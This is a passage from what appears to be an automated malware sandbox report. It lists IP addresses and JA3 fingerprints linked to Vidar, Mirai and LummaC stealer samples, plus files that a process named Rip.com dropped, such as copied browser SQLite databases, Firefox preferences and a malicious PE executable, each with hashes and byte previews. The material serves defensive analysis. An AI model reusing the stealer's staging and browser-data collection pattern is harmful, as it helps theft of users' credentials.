                                                                                                                                                                                                                                                  • 88.198.193.213
                                                                                                                                                                                                                                                  BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 116.203.14.4
                                                                                                                                                                                                                                                  botx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                  • 49.13.202.247
                                                                                                                                                                                                                                                  Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 116.203.14.4
                                                                                                                                                                                                                                                  db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                                  • 5.9.64.57
                                                                                                                                                                                                                                                  Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 136.243.250.139
                                                                                                                                                                                                                                                  JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 116.203.8.178

                                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19LinxOptimizer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 116.203.13.109
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 116.203.13.109
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 116.203.13.109
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 116.203.13.109
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  DypA6KbLrn.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 116.203.13.109
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  IOnqEVA4Dz.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 116.203.13.109
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  HngJMpDqxP.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 116.203.13.109
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 116.203.13.109
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  GYede3Gwn0.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 116.203.13.109
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 116.203.13.109
                                                                                                                                                                                                                                                  • 149.154.167.99

                                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comover.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                          AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                            0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                              installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                  !Set-up..exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                    !Setup.exeGet hashmaliciousLummaC StealerBrowse

                                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                                      C:\ProgramData\8y5fk\26pzcb

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                      C:\ProgramData\8y5fk\2dtjmy

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):126976
                                                                                                                                                                                                                                                                      Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                                      MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                                      SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                                      SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                                      SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                      C:\ProgramData\8y5fk\3ekx4w

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):294912
                                                                                                                                                                                                                                                                      Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                                                                      MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                                                                      SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                                                                      SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                                                                      SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                      C:\ProgramData\8y5fk\6fcjw4

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):9571
                                                                                                                                                                                                                                                                      Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                                      MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                                      SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                                      SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                                      SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                      C:\ProgramData\8y5fk\eu3w4o

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                      C:\ProgramData\8y5fk\jwt26x

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                                                      Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                                      MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                                      SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                                      SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                                      SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                      C:\ProgramData\8y5fk\s0rqq9zm7

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                      C:\ProgramData\8y5fk\uaa1dt

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):114688
                                                                                                                                                                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                      C:\ProgramData\8y5fk\uaa1dt26x

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                      Size (bytes):947288
                                                                                                                                                                                                                                                                      Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                                      • Filename: over.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                                      • Filename: MatAugust.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                      • Filename: 6684V5n83w.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                      • Filename: vlid_acid.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                      • Filename: AquaPac.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                      • Filename: 0442.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                      • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                      • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                      • Filename: !Set-up..exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                      • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\d

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):553082
                                                                                                                                                                                                                                                                      Entropy (8bit):7.999632931333854
                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                      SSDEEP:12288:nLIkNWuYx5ChEy+1X/0XDjbU8FnJzG4RXx9n7kP1JAvEEvDu+7X:nPM1x5lvXco8FJzzXcP1JWvxr
                                                                                                                                                                                                                                                                      MD5:E4B81AE7DDC3C4BDA8F848165607E1FD
                                                                                                                                                                                                                                                                      SHA1:4F72902129AA422FFB1EEA08EF2791D6063F855B
                                                                                                                                                                                                                                                                      SHA-256:6110FDF4CE25C3DBE2B4071ED01D61C22074ED4C9007FC84ACF52A7556E1238B
                                                                                                                                                                                                                                                                      SHA-512:6ABCCD18805A5E6E5352092953E37A678B38C90EDBB48DA42105114A1E0DC33BE45F3EFF597C5AF3CCEED7855CD915C87FB5869A6E967B691A307E78C8C046D6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:..I.I. ..R.._F$?.}gt.P..&...}0D.!.=..P.....K...N<..>%l...{0..@..>...vKt.....d..n.C.d....t.B....L.=.Z.D.WpV.....^.6\.v........N:..'....}...5..i;Bv.]..A6.`....!..4._..8...iq}. +w.(..3....`..j5Ss.].b.M.....v......?..Dn.=..u...d~r.zP.-om.,...S.Y.....no...N.....M..a?....YA>a...TR....-...V n)d......`...,0:KS..o..Wp..V.i..=0.....\.......z..w...}*.........O..=f.M...[{).{....yw%...e...HIR.[...w..=".]/&.[V-1.*.Y....0..1.. D...._an.4....h\..5..-7...K.).|....Q:J0..d.$.W..........>...E....H."..w.#y..L.k.q.b.zn.~.......lv.p...&2*.s....6....U.....h.......+.u....0.........J...Q..-`]\.n...g.....$.v$........S.$.....\....(..-.QC..1,.?..f.B.l.`....J?Q...6c...iK.`......m.N...+.S ...iL.6.=...~I!....*<b..O...XK.bG..bd..."...f&.S.d.........3......t?:rl@...0...{z..<H.....7.7./..).^a......o../O5...m.>.T..^....(9D.z...._..y.XVv.... Xf&...%.......8E.....@^-./.S....I...S..1....y.Ae=../..A......M.......g.j.=KG.P..Ux......Z.....$x.C_ .A.....C...W.8..%2.....$G."<O.D.

                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Anaheim

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                                                      Entropy (8bit):7.996134997391113
                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                      SSDEEP:1536:yrD2beNrqP00aY+iNqat6Pl1/SM4uW6m9/A:C6barjY+iNLt6jlta4
                                                                                                                                                                                                                                                                      MD5:D47D264E45EAE9E710ABE7D637233B58
                                                                                                                                                                                                                                                                      SHA1:53739DB46BDC02ABCBE729C543F89A68AEA5F851
                                                                                                                                                                                                                                                                      SHA-256:6C95197DFD4D23CAA89C38802FF9D0EC646889F180348E161D467635E4BEADD8
                                                                                                                                                                                                                                                                      SHA-512:51CC502781C3204901C6EEFCF6233CEFEF2B99D2D5A63FD047D795619DE7B3D2F0E38B8C7CB32920963232F0CA60ED6F2490984146C662C4CBEF5184F6EEA451
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:e.......".....:...`..v....Y.9.o........Ixm.#%|...t5@......6`.JN.......b.Vh.....s.....bj.g.:.k...9v.`..e.........B=.xRp;..n.j...6>..B._.:.~9{.2`.9d....'.L.F#.'S......x..$."....S5.=....k.9.%MI..C...PT4.._.....w...O#w........t.\3..g:i.t....>h........$...l....l.).......e&....So......t..]...B.Be.+V....b.FJ_T ..$......k./-...'I.....%._..T....;C......-.3?...K.9,?..^YA.Q.....j0i..|.yH..M....`..t.2g...o.*....!..p.RX+.~n.}...Q..A......Uw...D..L.Y.Z*...._J...... y.........>.....Q.#.o.&.......@.3.?..A.l..L..Z.u.....$n.(......'.Cf..9.rQ.5....D..k.p...0..rHNj....(T.V.j.E...A.e..K.....ul...$.........M....m...[(.....e/6$.um.......0.....mw.r.... .!.^!.......Z.=.>q.l.E8x.........P.~......V.......O....S.l./.w*/M}....Ihk..r....+n.....u{..sY7f.KNn..MI...V..Z....).V.bmh..:.).)..N...Xw.*..J..[...a.l+zJX"r..zQ.bM..XF.?.......@.%..[..u./E...k6....fY|.vU....3N.......n.H.Yp.3...P&.......>....M..{~..K........jB.}t}.....<?(.ZM9...Q...C...hh..X ../)-...

                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Architecture

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):2488
                                                                                                                                                                                                                                                                      Entropy (8bit):5.333442326623889
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:59n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+1:zSEA5O5W+MfH5S1CqlVJcIn
                                                                                                                                                                                                                                                                      MD5:3A19F105F8D5FEC8C6A8D87CB00FA6F3
                                                                                                                                                                                                                                                                      SHA1:0800FA54FCC35081296B0A5917C724AB4F8EA858
                                                                                                                                                                                                                                                                      SHA-256:C76AD62BD8428160A4A87AD0A1D4971A93B6A7EAD0A807260E2DEEF7376C8E32
                                                                                                                                                                                                                                                                      SHA-512:9BCA68DE1A85C68D6F06A3849E44FEA0E84B0EB3D3D8DE7A61D3658920D46C8E8BE9F914254BBF3307084B6B1E707F3EC87128D25BB3841BF0D5ADEC72CCD7A0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:Borough........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Assumptions

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):72704
                                                                                                                                                                                                                                                                      Entropy (8bit):7.997711091236596
                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                      SSDEEP:1536:8uaZ2xT3ltgrK6cj0oX/bEUFk24ZFMnl+unTau3rJxZBF/t4:DaQxTVCKzX/bEUh48ljnmYrB/t4
                                                                                                                                                                                                                                                                      MD5:7EDC088EA18D136349CE4CD9F745A697
